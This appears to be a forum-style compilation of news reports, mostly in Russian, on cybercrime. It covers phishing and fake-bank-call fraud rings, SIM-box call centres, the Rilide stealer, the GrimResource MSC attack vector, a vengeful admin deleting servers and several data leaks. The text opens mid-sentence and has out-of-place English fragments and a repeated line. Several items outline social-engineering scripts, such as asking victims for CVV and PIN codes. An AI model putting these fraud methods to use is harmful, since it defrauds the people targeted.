через их смартфоны.
Since December, FTA-linked hacks have been reported by the Reserve Bank of New Zealand, Australian Securities and Investments Commission (ASIC), law firm Allens, the University of Colorado, and more
Преступную схему разоблачили работники управления противодействия киберпреступлениям в Днепропетровской области совместно со следственным отделом Днепровского районного управления полиции.
Трое 19-летних местных жителей создали около десяти фишинговых сайтов, которые полностью копировали дизайн иностранных интернет-площадок объявлений.
Пользователи, граждане стран Европы и Америки, на фейковых ресурсах вводили
свои банковские данные для расчета.
В дальнейшем собранные данные карточек злоумышленники "подвязывали к системе
бесконтактной оплаты на телефонах. Со счетов пострадавших фигуранты оплачивали
покупки в магазинах бытовой техники.
Сейчас полицейские устанавливают круг обманутых. Предварительная сумма ущерба достигает более миллиона гривен.
В домах фигурантов правоохранители провели обыски и изъяли мобильные телефоны, компьютерную технику и банковские карточки. Изъятое направлено на проведение экспертных исследований.
Открыто уголовное производство по ч. 2 ст. 200 (Незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам) Уголовного кодекса Украины.
Решается вопрос об объявлении о подозрении и избрании меры пресечения злоумышленникам.
Следственные действия продолжаются.
Сотрудники Бюро специальных технических мероприятий (БСТМ) МВД России совместно с ГУ МВД России по Ростовской области проводят мероприятия, направленные на пресечение хищений денежных средств граждан Российской Федерации с использованием сим-боксов.
«По имеющимся данным, ранее судимый мужчина по указанию куратора, который, предположительно, находится на территории Украины, арендовал квартиру в Ростове-на-Дону. Там он установил два сим-бокса, предназначенные для одновременной работы большого количества сим-карт. Аферисты звонили гражданам, входили в доверие и узнавали их персональные данные. Это позволяло в дальнейшем получать доступ к личным кабинетам на портале «Госуслуги» или в банковских приложениях.
С целью конспирации каждая сим-карта использовалась не более суток. Кроме того, фигурант менял адреса проживания. Однако это ему не помогло. Сотрудники Бюро специальных технических мероприятий МВД России, используя инновационные технологии, в том числе искусственный интеллект и нейросети, установили местонахождение подозреваемого. Во взаимодействии с оперативниками ГУ МВД России по Ростовской области он был задержан в Ростове-на-Дону», – сообщила официальный представитель МВД России Ирина Волк.
В арендованной мужчиной квартире обнаружены два сим-бокса на 128 сим-карт каждый, 2500 сим-карт различных операторов сотовой связи, антенно-фидерное оборудование и другие предметы, имеющие доказательственное значение.
В ходе анализа работы этих устройств полицейские выявили 15 тысяч звонков на абонентские номера граждан России для осуществления противоправных действий.
«Следователем ГУ МВД России по Ростовской области возбуждено уголовное дело по признакам преступления, предусмотренного пунктом «г» части третьей статьи 158 УК РФ. Предварительное расследование продолжается», – добавила Ирина Волк.
• Video: https://rutube.ru/video/85bb05313eac679298c4ffe12ec73d39/?r=plemwd
1 апреля в полицию города Архангельска с заявлением обратился 30-летний местный житель. По словам потерпевшего, в январе текущего года в сети Интернет он увидел объявление о продаже майнинг-фермы (оборудования, которое технически оснащено для «добычи» криптовалюты). Решив приобрести аппаратуру, потерпевший связался с продавцом. Незнакомец пояснил, что готов продать оборудование за четыре миллиона рублей и в течение 15 дней доставить в Москву.
Заключив официальный договор купли-продажи и предварительно поручив юристам проверить данные продавца, мужчина перевел необходимую сумму по указанным реквизитам.
Спустя некоторое время, не дождавшись первой доставки оборудования, архангелогородец решил приобрести еще одну майнинг-ферму у этого же продавца. Заключив очередной договор, он вновь осуществил транзакцию в размере более четырех миллионов рублей.
Когда срок ожидаемой поставки истек, потерпевший решил связаться с продавцом и уточнить причины задержки товара. Однако телефон абонента оказался недоступен. После безуспешных попыток выйти на связь архангелогородец осознал, что был обманут и обратился с заявлением в полицию.
В настоящее время по данному факту возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 Уголовного кодекса Российской Федерации (Мошенничество, совершенное в особо крупном размере). Санкция статьи предусматривает максимальное наказание в виде лишения свободы на срок до десяти лет. Проводится расследование.
Полиция призывает граждан скептически относиться к информации, получаемой от посторонних лиц. Необходимо помнить, что сделки купли-продажи товаров через частные объявления в интернете – большой риск. Ни вежливый и дружелюбный тон беседы, ни фото направленных документов не могут гарантировать, что вы общаетесь с порядочным и честным человеком, а не с мошенником.
Старшим следователем СУ Управления МВД России по городу Новосибирску завершено расследование уголовного дела по факту хищения путем обмана денежных средств граждан, совершенного группой лиц (ст. 159 УК РФ «Мошенничество»).
В ходе предварительного следствия установлено, что трое жительниц Новосибирска в возрасте от 21 года до 30 лет совершали хищение денежных средств граждан дистанционным способом. В период с апреля по май 2023 года, используя базу финансовых организаций, подозреваемые звонили клиентам, оставившим заявки на получение кредита. Представляясь работниками банков, они сообщали потерпевшим о якобы одобренном кредите и убеждали перечислить им денежные средства под предлогом необходимости оплаты дополнительных услуг по выдаче кредита (комиссия за дистанционное обслуживание, оплата страховки, курьерская доставка документов, инкассация и т.д.). В качестве кол-центра обвиняемые использовали автомобиль, принадлежащий одной из соучастниц, передвигаясь на котором в течение дня меняли местоположение с целью конспирации.
В начале августа 2023 года сотрудники Управления уголовного розыска ГУ МВД России по Новосибирской области при силовой поддержке спецподразделения Росгвардии задержали подозреваемых.
В ходе следствия установлены 11 потерпевших – это жители Воронежской, Томской, Липецкой и Орловской областей, Республик Татарстан, Башкирия, Крым, Калмыкия, Забайкальского и Краснодарского краев. Общая сумма ущерба составила более 280 тысяч рублей.
В ходе предварительного следствия на имущество обвиняемых был наложен арест на общую сумму более 1 миллиона рублей.
В отношении одной фигурантки избрана мера пресечения в виде заключения под стражу, двое находятся под подпиской о невыезде.
Уголовное дело направлено Ленинский районный суд г. Новосибирска для рассмотрения по существу.
• Video: мвд.рф/news/item/51624138/
Как сообщалось ранее главным управлением цифрового развития предварительного следствия центрального аппарата Следственного комитета Республики Беларусь возбуждено и расследуется уголовное дело в отношении участников международной преступной группы, которая специализировалась на мошенничестве, посредством колл- центров.
В ходе предварительного следствия установлено, что в период с февраля 2020 года по январь 2024 года на территории Республики Беларусь, Российской Федерации, Государства Израиль, Кыргызской Республики и других государств действовала международная организованная преступная группа. Её участники размещали в сети Интернет сайты с ложной информацией о возможности получения денежного вознаграждения за счет инвестирования денежных средств в прибыльные финансовые компании, которых фактически не существовало.
При обращениях граждан к указанным сайтам с ними под видом менеджеров связывались участники ОПГ, которые посредством методов «социальной инженерии» внушали гражданам то, что они могут выгодно инвестировать, предоставляли реквизиты «депозитных» счетов, которые в действительности таковыми не являлись, а использовались в деятельности группы. В результате введенные в заблуждение «клиенты» безвозвратно переводили свои сбережения преступникам.
Для прикрытия деятельности в Минске, Москве и Бишкеке регистрировались субъекты хозяйствования, от имени которых под видом осуществления рекламных и иных услуг участники преступной группы арендовали офисы, где фактически размещались мошеннические «колл-центры», откуда с использованием IP-телефонии осуществлялись звонки гражданам.
На территории Республики Беларусь и Российской Федерации была установлена и пресечена деятельность указанных «колл-центров». По подозрению в совершении преступления в январе этого года задержано 55 участников организованной группы, в том числе организаторы. В отношении 49 задержанных применена мера пресечения в виде заключения под стражу, последним предъявлено обвинение.
В ходе предварительного следствия установлено, что в состав вышеописанной ОПГ входили граждане Республики Беларусь, которые осуществляли свою преступную деятельность с территории Кыргызской Республики. Один из таких участников признан подозреваемым по уголовному делу, с последующим вынесением постановления о привлечении его в качестве обвиняемого. С санкции заместителя Генерального прокурора Республики Беларусь к нему применена мера пресечения в виде заключения под стражу. В тот же день фигурант объявлен в межгосударственный розыск.
Представители Следственного комитета и МВД Беларуси выбыли в Кыргызскую Республику, где провели ряд рабочих встреч с представителями правоохранительных органов указанного государства. В ходе визита разработана стратегия взаимодействия и реализованы мероприятия по поимке преступника. При проведении следственно-оперативных мероприятий, сотрудниками ГУУР МВД Кыргызской Республики на территории Бишкека был задержан разыскиваемый участник транснациональной организованной преступной группы, который через мошеннический колл-центр работал по Беларуси. В результате проведения обыска по месту его временного проживания обнаружена и изъята компьютерная техника, носители информации и денежные средства. В настоящее время мужчина задержан и ему предъявлено обвинение за мошенничество. Прорабатывается вопрос о его экстрадиции в Республику Беларусь для дальнейшего привлечения к уголовной ответственности.
Как сообщает прокуратура Приморского края, обвиняемые предложили бессемейному разнорабочему, проживающему в их дачном доме, подписать контракт и уехать на СВО. Перед поездкой они оформили ему фиктивный брак с 63-летней женщиной, чтобы в случае смерти она смогла получить «гробовые» выплаты.
Летом 2023 года мужик уехал воевать, а осенью стало известно, что он погиб. После этого «вдова» с помощью смартфона, принадлежащего семейной паре, открыла счет и получила выплату. Затем она сняла деньги.Ущерб от преступных действий превысил 8 млн рублей, которые они разделили по собственному усмотрению.
Ущерб от преступных действий превысил 8 млн рублей, которые они разделили по собственному усмотрению.
Click to expand...
Возбуждено уголовное дело по ч. 4 ст. 159 УК РФ (мошенничество в особо крупном размере).
Аферистки обманывали граждан, представляясь работниками банков. Женщины в телефонных разговорах уверяли граждан, что к их счетам получили доступ посторонние лица. Для «защиты» просили назвать все банковские данные, а получив их - присваивали деньги потерпевших. Злоумышленницы обманули около 30 граждан из разных областей.
Мошенническую схему разоблачили правоохранители управления уголовного розыска ГУНП в Черкасской области, следователи Черкасского районного управления полиции совместно с работниками киберполиции.
Полицейские установили, что мошеннической схемой занимались две жительницы с. Белозерье Черкасского района, 25-ти и 27-ми лет.
Фигурантки звонили гражданам из разных областей, выдавая себя за представителей банка и убеждали, что их банковский счет заблокирован и для его разблокирования необходимо предоставить код-подтверждение, которое поступит в SMS-сообщении. Злоумышленницы выпрашивали номер, CVV-код, PIN-код карточки и срок действия. Потерпевшие выполняли просьбу неизвестных, после чего с их банковских счетов исчезали денежные средства.
По предварительным подсчетам, злоумышленницы обманули около 30 граждан из разных областей. Общая сумма убытков достигает более 750 тысяч гривен.
Во время санкционированных обысков в помещениях подозреваемых правоохранители изъяли мобильные телефоны, более 30 банковских карточек, SIM-карты и флеш- накопители.
Злоумышленницам объявили подозрение в 24 эпизодах по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Следственные действия продолжаются. Процессуальное руководство осуществляется Черкасской окружной прокуратурой.
Сейчас продолжаются следственные действия, устанавливаются все лица, которые могли пострадать в результате мошеннических действий.
Gочерняя компания Google — TLD — открыла свободную регистрацию доменных имён
.zip. Адреса мгновенно раскупили скамеры. Об этом
рассказал блогер
Germán Fernández в своём Twitter.
На своих сайтах мошенники предлагают скачать плагины для ChatGPT, Microsoft
Office и Google Аналитику.
Доменные имена скупаются со скоростью света. К примеру, адрес chatgpt.zip уже
куплен.
Иногда, однако, на сайтах с доменом .zip встречаются забавные файлы для
скачивания. К примеру, на сайте csgo.zip можно скачать архив с единственной
фотографией внутри.
https://media.tproger.ru/uploads/2023/05/af9bc038-227a-46ac-8e68-5b3cf0f3ffa2.jpeg
Вот, какие адреса скамеры уже заняли:
source: twitter.com/1zrr4h/status/1657747300339384320
Предполагаемые северокорейские хакеры выдают себя за журналистов и пытаются собирать информацию о подходе международных руководителей в области ядерной политики безопасности и о правительстве Ким Чен Ына, как показывают новые исследования. Не очень дискретно ))
straitstimes(.)com/world/united-states/north-korean-hackers-posed-as-new-york- times-voice-of-america-staff
Жители Баштанки обманывали граждан, продавая с фейковых аккаунтов в социальной сети одежду и обувь, которых не имели в наличии. Всего по оценке киберполиции от действий злоумышленников пострадало не менее 200 граждан из разных регионов Украины, а сумма нанесенного им ущерба составляет более 300 тысяч гривен.
Аферисты, действуя как отдельно, так и в группе, разработали несколько мошеннических схем, заключавшихся в создании в соцсети многочисленных страниц так называемых магазинов по продаже одежды и обуви по ценам значительно ниже рыночных. Конечно, никакого товара у мошенников не было, но от покупателей они требовали и получали полную подписку на подконтрольные им банковские карты, а после поступления средств блокировали клиентов и больше на связь не выходили.
Сотрудники отдела противодействия киберпреступлениям в Николаевской области Департамента киберполиции НПУ совместно со следователями Баштанского районного отдела полиции под процессуальным руководством окружной прокуратуры и при силовой поддержке спецназа провели у фигурантов санкционированные обыски, прекратив деятельность двух мошеннических групп, в состав которых входили не менее 5 местных жителей.
Во время обысков в домах аферистов правоохранители обнаружили и изъяли: 2 компьютера, 16 мобильных телефонов, 12 банковских карт, 32 SIM-карты, а также черновые записи и другие вещественные доказательства, указывающие на причастность данных лиц к противоправной деятельности. Сейчас изъятое направлено на экспертизу.
Сейчас продолжается досудебное расследование по ч. 3 ст. 190 УК Украины (Мошенничество), санкция которой предусматривает до восьми лет лишения свободы. Полиция устанавливает всех причастных к мошеннической схеме лиц, а также окончательное количество пострадавших.
Компания Uniswap Labs объявила, что выплатит до $15,5 млн за обнаружение критической уязвимости в основных контрактах четвертой версии протокола некастодиальной биржи Uniswap.
__https://twitter.com/x/status/1861409607505064238
Согласно заявлению, вознаграждение являются крупнейшим в истории баунти- программ.
Протокол v4 призван кардинально снизить затраты на комиссии для поставщиков ликвидности и пользователей, а также кастомизировать платформу за счет использования «хуков». Это контракты, которые разработчики могут создавать для настройки взаимодействия пулов, свопов, комиссий и других опций.
В начале года команда Uniswap анонсировала запуск четвертой итерации протокола в III квартале.
По заявлению разработчиков, Uniswap v4 входит в число наиболее проверенных кодовых баз в DeFi. Протокол прошел девять независимых аудитов от OpenZeppelin, Spearbit, Certora, Trail of Bits, ABDK и Pashov Audit Group. Дополнительно 500 исследователей приняли участие в конкурсе по поиску критических уязвимостей с максимальной премией $2,5 млн.
«По мере приближения развертывания мы предпринимаем дополнительные шаги, чтобы гарантировать максимальную безопасность v4 с баг-баунти в размере $15,5 млн», — подчеркнули в Uniswap Labs.
Программа включает поиск ошибок в основных контрактах Uniswap. Максимальная выплата назначена за уязвимости с критическим риском. За обнаружение угрозы высокого уровня полагается уже $1 млн, а среднего — $100 000.
Награды предусмотрены также за баги в периферийных контрактах Uniswap за пределами v4. Здесь максимальная сумма составляет $2,25 млн. Намного меньшие вознаграждения можно заработать за найденные ошибки в веб-интерфейсе, бэкенде и мобильном кошельке биржи.
Общий объем заявленной биржей баунти-программы достигает $44,4 млн.
Новый вектор атаки, получивший имя «GrimResource», позволяет выполнить произвольные команды с помощью непропатченной XSS-уязвимости в Windows и специально созданных файлов в формате MSC (Microsoft Saved Console).
На .msc-файлы злоумышленники перешли после того, как Microsoft приняла ряд защитных мер, затрудняющих проведение фишинговых атак с помощью ярлыков и файлов OneNote.
Windows MSC используются в Консоли управления (MMC) для настройки различных компонентов операционной системы, а также для создания кастомного представления часто используемых инструментов.
Команда исследователей из компании Elastic обнаружила новую технику распространения MSC-файлов и эксплуатации старой, но незакрытой уязвимости межсайтового скриптинга в Windows. Ранее эта XSS, затрагивающая библиотеку apds.dll, использовалась для установки Cobalt Strike.
Специалисты Elastic нашли образец (sccm-updater.msc), загруженный на VirusTotal 6 июня 2024 года. Оказалось, что этот семпл использовал вектор GrimResource, что означает применение техники в реальных кибератаках. Интересно, что ни один антивирус не выявил угрозу.
Отметим также, что вредоносные MSC-файлы, участвующие в GrimResource, эксплуатируют дыру в apds.dll, которая позволяет выполнять JavaScript-код с помощью специально подготовленных URL.
Microsoft узнала об этой уязвимости ещё в октябре 2018 года, однако корпорация тогда посчитала, что уровень проблемы не соответствует подходящим под патчинг критериям.
В Elastic также уточнили, что упомянутая брешь может использоваться в связке с техникой DotNetToJScript. Они вместе позволяют выполнять .NET-код через JavaScript-движок.
Специалисты поделились в соцсети X видеодемонстрацией GrimResource:
Системный администратор удалил 180 виртуальных серверов своего работодателя, не желая мириться с несправедливым, по его мнению, увольнением. Компания понесла огромные убытки, а самого администратора упекли в тюрьму почти на три года.
Системный администратор обиделся
Сингапурская компания NCS понесла крупные убытки в результате действия своего бывшего системного администратора, который решил отомстить ей за свое увольнение. Как пишет агентство Channel News Asia (CNA), администратор пробрался в виртуальную инфраструктуру компании и уничтожил 180 виртуальных серверов в ее составе.
По данным CNA, случившееся стало результатом действий 39-летнего специалиста по имени Кандула Нагараджу (Kandula Nagaraju), выходца из Индии. Размер убытка, который нанес NCS его виртуальный «визит», достиг 918 тыс. сингапурских долларов или около $680 тыс. по курсу на 13 июня 2024 г.
Агентство пишет, что Нагараджу был «смущен и расстроен» (confused and upset) своим увольнением, так, как, по его мнению, его лишили работы незаслуженно. Он уверен, что не только хорошо зарекомендовал себя, но и «внес весомый вклад» (made good contributions) в работу NCS.
У NCS, судя по всему, сложилось иное мнение о способностях Нагараджу. Он проработал в компании с ноября 2021 г. по октябрь 2022 г. и числился в составе группы из 20 человек, управлявшей компьютерной системой обеспечения качества (QA) в NCS.
По данным CNA, карьерный путь Нагараджу в NCS оборвался столь резко далеко не просто так. Его уволили именно за низкое качество выполнения поставленных перед ним обязанностей.
Никаких виртуальных преград
Компания NCS предлагает своим клиентам информационно-коммуникационные и технологические услуги. В частности, она занимается тестированием нового программного обеспечения перед его запуском при помощи системы, которую обслуживал Нагараджу. Представители NCS сообщили агентству, что эта система «полностью автономна» (standalone test system). Она состояла примерно из 180 виртуальных серверов, и на них не хранилась никакая конфиденциальная информация.
Между тем, Нагараджу сумел проникнуть в эту систему извне, притом из другой страны. После увольнения из NCS он не смог найти другую работу в Сингапуре и был вынужден вернуться в Индию, откуда со своего личного ноутбука подключился к системе, используя учетную запись администратора.
В общей сложности Нагараджу подключался к «автономной» системе шесть раз – он делал это в период с 6 по 17 января 2023 г. В феврале того же года Нагараджу вернулся в Сингапур, найдя новую работу. Он снял комнату у бывшего коллеги из NCS и начал использовать домашний Wi-Fi для доступа к системе NCS.
В течение января и февраля 2023 г. он написал несколько скриптов для удаления виртуальных серверов. В марте 2023 г. он 13 раз подключался к системе контроля качества NCS. 18 и 19 марта 2023 г. он запустил специализированный для удаления 180 виртуальных серверов в системе. Его сценарий был написан так, что серверы удалялись по одному, а не разом.
На следующий день администраторы NCS обнаружили, что система недоступна, попытались восстановить ее, но потерпели неудачу. Также они убедились, что все 180 виртуальных серверов были удалены.
Неизбежное наказание
11 апреля 2023 г. NCS завершила внутреннее расследование. У нее был список из нескольких внешних IP-адресов, обнаруженных службой безопасности, и он был передан полиции для дальнейших поисков.
Стражи правопорядка быстро вышли на Нагараджу и конфисковали его ноутбук, в памяти которого обнаружили скрипт, который тот применил для удаления серверов в сети NCS. Также полиция проверила историю поисковых запросов Нагараджу и выявила, что он искал в интернете инструкции по написанию подобного рода скриптов.
В результате Нагараджу стал подозреваемым в несанкционированном доступе к компьютерной инфраструктуре NCS и материалам в сети компании. 10 июня 2024 г. суд признал его виновным в этом преступлении и вынес приговор – два года и восемь месяцев тюремного заключения.
Не нужно увольнять системных администраторов
Случаев, подобных тому, в котором фигурирует Нагараджу, по всему миру очень много. Например, в конце 2023 г. CNews освещал историю бывшего школьного сисадмина в одной из школ Нью-Джерси (США). Он отомстил экс-работодателю за увольнение, выведя из строя ряд ИТ-систем образовательного учреждения, воспользовавшись для этого все еще не отозванными на момент разрыва трудового договора полномочиями. Свою вину «диверсант» признал в суде. Ему грозили тюремное заключение сроком до 10 лет и крупный штраф.
В марте 2017 г. CNews писал, что уволенный из компании Lucchese Bootmaker системный администратор в отместку обрушил ее сервер, попутно удалив все файлы, необходимые для его восстановления. Это остановило работу всей компании, которая почти 150 лет производит ковбойские сапоги. В итоге сервер все же удалось восстановить силами стороннего подрядчика.
В сентябре 2022 г. CNews рассказывал историю уволенного американского системного администратора, который устроил настоящий хаос в ИТ-инфраструктуре своего бывшего работодателя. Он надеялся получить предложение вернуться на свою должность, чтобы он мог «спасти» компанию от хакеров, однако вместо этого получил угрозу тюремного заключения и крупный штраф.
Но иногда бывает и так, что виртуальную диверсию могут устроить и находящиеся в штате сотрудники. В мае 2024 г. CNews писал, что российский инженер, работавший на «Россети», смог при помощи личного ноутбука «по нажатию кнопки» лишить электричества жителей почти 40 населенных пунктов. Его поймали и осудили, и его ждали восемь лет тюрьмы, но ему удалось отделаться условным сроком. Впрочем, он остался без ноутбука – государство конфисковало его.
Исследователи кибербезопасности обнаружили новую версию вредоносной программы под названием Rilide, предназначенную для веб-браузеров на базе Chromium с целью кражи конфиденциальных данных и криптовалюты.
Стилер Rilide впервые был задокументирован компанией Trustwave в апреле этого года. При первом обнаружении Rilide выдавал себя за законные расширения Google Drive, однако был способен похищать целый спектр конфиденциальной информации пользователя.
Вредоносная программа продаётся на теневых форумах хакером по имени «friezer» за 5 000 долларов. По словам исследователей, Rilide демонстрирует высокий уровень изощрённости благодаря модульной архитектуре, обфускации кода и поддержке Chrome Extension Manifest V3 .
Вредонос имеет широкий набор функций, позволяющий ему отключать другие расширения браузера, собирать историю и cookie-файлы, красть учётные данные, делать скриншоты и даже внедрять вредоносные скрипты для хищения средств с различных криптобирж.
Обновлённая версия также перешла на использование Chrome Extension Manifest V3 — спорного API, введённого Google для ограничения доступа расширений. «С точки зрения безопасности, одним из ключевых новшеств является запрет на загрузку удалённого JavaScript-кода для расширений и исполнение произвольных строк», — поясняют исследователи. Однако разработчиков Rilide это не остановило, и они полностью переписали основные возможности вредоноса с использованием встроенных событий для запуска зловредного JavaScript-кода.
Одна из выявленных вредоносных кампаний была нацелена на несколько банков, поставщиков платёжных услуг, услуг электронной почты, платформ криптообмена, VPN и поставщиков облачных услуг, используя сценарии внедрения, в основном ориентируясь на пользователей в Австралии и Соединенном Королевстве.
Аналитики обнаружили более 1500 фишинговых страниц, использующих домены- опечатки, продвигаемых с помощью SEO-отравления в надёжных поисковых системах и выдающих себя за банки и поставщиков услуг, чтобы обманом заставить жертв вводить свои учётные данные в фишинговых формах.
В другом случае пользователи заражаются через фишинговые электронные письма, предположительно рекламирующие приложения VPN или брандмауэра, такие как приложение GlobalProtect от Palo Alto Networks.
В ходе этой кампании Trustwave обнаружила презентацию PowerPoint, предназначенную для сотрудников ZenDesk, которая умело выдаёт себя за официальную рекомендацию по безопасности, побуждая пользователей устанавливать расширение.
Эта презентация включает слайды, предупреждающие о том, что злоумышленники выдают себя за GlobalProtect для распространения вредоносного ПО, и содержит инструкции, которые сотрудники должны выполнить для установки правильного программного обеспечения.
Однако на самом деле это уловка социальной инженерии, направленная на то, чтобы заставить целевого пользователя установить вредоносное расширение Rilide вместо него.
Наконец, Trustwave обнаружила кампанию, запущенную в Twitter, которая ведет жертв на фишинговые сайты для поддельных игр на блокчейне P2E (играй, чтобы заработать). Однако установщики на этих сайтах вместо этого устанавливают расширение Rilide, что позволяет злоумышленникам красть криптовалютные кошельки жертв.
Цепочки заражения для трёх вредоносных кампаний Rilide
Компания Trustwave обещает продолжать мониторинг ситуации и своевременно информировать общественность о новых находках. Эксперты рекомендуют пользователям проявлять осторожность при установке непроверенных расширений браузера, использовать надёжные пароли и двухфакторную аутентификацию, а также устанавливать антивирус для защиты от подобных угроз.
МВД Турции сообщило, что Интерпол проводит процедуру экстрадиции Фатиха Озера, сбежавшего в 2021 году со средствами инвесторов
В Албании задержали основателя криптобиржи Thodex Фарука Фатиха Озера, объявленного в международный розыск, сообщило МВД Турции. Личность задержанного была подтверждена результатами биометрической проверки. Под руководством Главного управления полиции Интерпола начата процедура экстрадиции Озера из Албании в Турцию.
Thodex — турецкая криптовалютная биржа, которая была основана в 2017 году. В апреле 2021 года ее основатель внезапно уехал из страны, а платформа прекратила работу. Более 2 тыс. клиентов Thodex подали на нее в суд с обвинениями в мошенничестве и краже миллионов долларов.
Турецкая прокуратура начала расследование после бегства главы биржи, несколько человек было задержано. По сообщению Thodex, в ходе судебного заседания всего 21 человеку, включая брата и сестру Озера, было предъявлено обвинение в создании преступной группировки и мошенничестве. В общей сложности обвиняемым грозит срок от 12 164 лет до 40 564 лет тюремного заключения.
В конце июля СЕО и основатель Titanium Blockchain Infrastructure Services Inc. (TBIS) Майкл Алан Столлери признал себя виновным в мошенничестве с криптовалютами и незаконном обогащении на $21 млн. Компания при помощи схемы с первоначальным размещением нативного токена платформы (ICO) привлекла средства от инвесторов в США и других странах.
source:
icisleri.gov.tr/thodexin-kurucusu-firari-faruk-fatih-ozer-arnavutlukta-
yakalandi
thodex.com/thodex-trial-officially-started-in-turkey
video:
Журналисты издания [Vice Motherboard](https://www.vice.com/en/article/k78v8z/ciphr-encrypted-phone- shutdown-australia), ссылаясь на собственные источники в индустрии зашифрованных телефонов, сообщают, что производитель зашифрованных девайсов Ciphr, которые весьма популярны в криминальной среде, прекращает работу в Австралии.
По данным журналистов, разработчики Ciphr опасаются внимания со стороны правоохранительных органов, так как Ciphr — один из немногих крупных игроков, все еще работающих в этой сфере.
Напомню, что минувшим летом мы рассказывали о масштабной операции Trojan Shield (в некоторых ведомствах операция носила названия Greenlight и Ironside), о завершении которой отчитались ФБР, Европол и спецслужбы других стран мира.
В рамках операции правоохранители создали и несколько лет поддерживали собственную платформу для зашифрованных коммуникаций Anom (она же An0m или Anøm — в отчетах разных ведомств название «звучит» по‑разному), подобную Encrochat и Phantom Secure. Это средство связи обрело огромную популярность среди преступников во всем мире, благодаря чему правоохранители получили возможность следить за всеми их коммуникациями. За годы работы Anom правоохранительным органам удалось распространить среди преступников более 12 000 «защищенных» устройств более чем в 100 странах мира.
Источники сообщают, что теперь Ciphr запретил реселлерам работать в Австралии, так упомянутая операция Trojan Shield была бы невозможна без усилий Австралийской федеральной полиции. Дело в том, что в этом бизнесе продажу телефонов обычно отдают на аутсорсинг, поручая это дистрибьюторам и агентам, работающим на определенных рынках, и Австралия теперь оказалась под запретом.
В начале июля другой человек предоставил изданию скриншоты устройства Ciphr. Один скриншот демонстрировал, что у пользователя еще осталось несколько дней подписки, но в строке состояния в верхней части экрана значилось «Отключен». Скриншоты были сделаны на телефоне Ciphr, работавшем в Австралии.
Еще один источник сообщил, что Ciphr также прекратил работу и в США, однако никаких прямых доказательств этого журналистам найти не удалось.
Ciphr предлагает своим пользователям серию приложений, ориентированных на конфиденциальность, которые сама компания устанавливает на Android-устройства. В их числе: мессенджер Ciphr Text со сквозным шифрованием, email-система Ciphr Mail, а также решения для локального хранения файлов Ciphr Vault.
Дистрибьюторы таких зашифрованных телефонов могут продавать устройства с предустановленным ПО компании за тысячи долларов (с полугодовой или годовой подпиской).
По данным СМИ, Ciphr широко [используется](https://www.dailymail.co.uk/news/article-8925301/The-one-fatal- mistake-brought-24million-cocaine-syndicate.html) преступными группировками, включая наркоторговцев в Австралии. К примеру, по информации издания [Sydney Morning Herald,](https://www.smh.com.au/national/meet-the-next-mr-big-in-the- criminal-underworld-he-s-known-as-mr-blonde-20210610-p58006.html) одна конкретная криминальная организация сумела избежать операции Anom именно благодаря использованию Ciphr.
Интересно, что недавно разработчики Ciphr представили бесплатное приложение Ciphr Lite, которое, согласно Google Play Store, было загружено более тысячи раз. Приложении позволяет отправить сообщение другому пользователю в сети Ciphr, если у того включен соответствующий параметр. Приложению не нужен номер телефона или адрес электронной почты для регистрации пользователей, но, судя по отзывам, многим новая услуга компании пришлась не по вкусу.
«Какого х*@ [вы] выпускаете приложение, связанное с платными подписчиками? Это не игра», — пишет один из разгневанных пользователей Ciphr.
Click to expand...
Список стран, в которых Ciphr планирует внедрить Ciphr Lite, включает более 100 стран мира, но в нем нет США и Австралии.
Источник: https://xakep.ru/2021/09/14/ciphr/
Хакеры решили явить миру гастрономические пристрастия россиян: в Сеть слиты
данные клиентов еще одной крупной службы доставки еды — Delivery Club. В
компании подтвердили факт утечки и запустили внутреннее расследование.
«Служба безопасности Delivery Club обнаружила утечку данных о совершенных
некоторыми пользователями заказах, — сообщили ТАСС в пресс-службе Delivery
Club. — Данные включают в себя информацию о заказах и не затрагивают
банковские реквизиты. Делаем все возможное для предотвращения распространения
данных».
Пострадавший сервис также начал принимать меры по повышению защиты данных и планирует провести дополнительный аудит внутренних систем. О публикации клиентских данных Delivery Club сообщалось в профильных Telegram-каналах In4security и «Утечки информации».
Автор слива утверждает, что в его распоряжении имеется база на 250 млн
записей. В открытый доступ выложен образец — файл, содержащий более 1 млн
строк со следующей информацией:
-имя клиента;
-номер телефона (827 758 уникальных контактов);
-адрес доставки, код домофона, этаж, номер подъезда;
-email (183 852 уникальных адреса);
-IP-адрес (507 673 уникальных);
-состав заказа и стоимость;
дата и время заказа (с 24.05.2020 по 04.07.2021).
В конце февраля с похожим инцидентом столкнулась «Яндекс.Еда». Как оказалось, утечка произошла по вине инсайдера, в результате службу доставки готовых блюд оштрафовали на 60 тыс. рублей.
Кристиан Риу (Christien Rioux) сообщил о решении открыть исходные тексты инструментария L0phtCrack, предназначенного для восстановления паролей по хешам. Продукт развивается с 1997 года и в 2004 году был продан компании Symantec, но в 2006 году выкуплен тремя основателями проекта, в числе которых был Кристиан Риу. В 2020 году проект поглотила компания Terahash, но в июле этого года права на код были возвращены изначальным авторам из-за невыполнение обязательств по сделке. В итоге, создатели L0phtCrack решили отказаться от поставки инструментария в форме проприетарного продукта и открыть исходные тексты.
Код планируется опубликовать после конференции DEFCON, которая пройдёт с 5 по 8 августа. Код будет размещён в сервисе GitLab, а не на GitHub, из-за неприязни к компании Microsoft. Среди планов по дальнейшему развитию L0phtCrack называется портирование кода под Linux и macOS (изначально поддерживалась только платформа Windows). Отмечается, что портирование не составит труда, так как интерфейс написан с использованием кросс-платформенной библиотеки Qt.
Для публикации намечена ветка L0phtCrack 7 (последняя версия проекта), опубликованная в 2016 году и поддерживающая использование GPU для ускорения подбора паролей. Часть кода заимствована из открытого проекта John the Ripper, который позиционируется в качестве основного движка для подбора паролей в L0phtCrack. В планах имеется создание плагина для поддержки hashcat.
Personal and financial information stolen from Stanford Medicine, University of Maryland Baltimore (UMB), and the University of California was leaked online by the Clop ransomware group.
The threat actors obtained the documents after hacking the universities'
Accellion File Transfer Appliance (FTA) software used to share and store
sensitive information.
Data stolen in the attack targeting Stanford Medicine's Accellion server
includes names, addresses, email addresses, Social Security numbers, and
financial information, reported the [Stanford
Daily](https://www.stanforddaily.com/2021/04/01/hackers-leak-social-security-
numbers-student-data-in-massive-data-breach/).
"We discovered the breach earlier this week when the hackers posted evidence that they had accessed a limited number of files in our system containing some personally identifiable information," UMB also told [DataBreaches.net](https://www.databreaches.net/university-of-maryland- baltimore-responds-to-accellion-breach/).
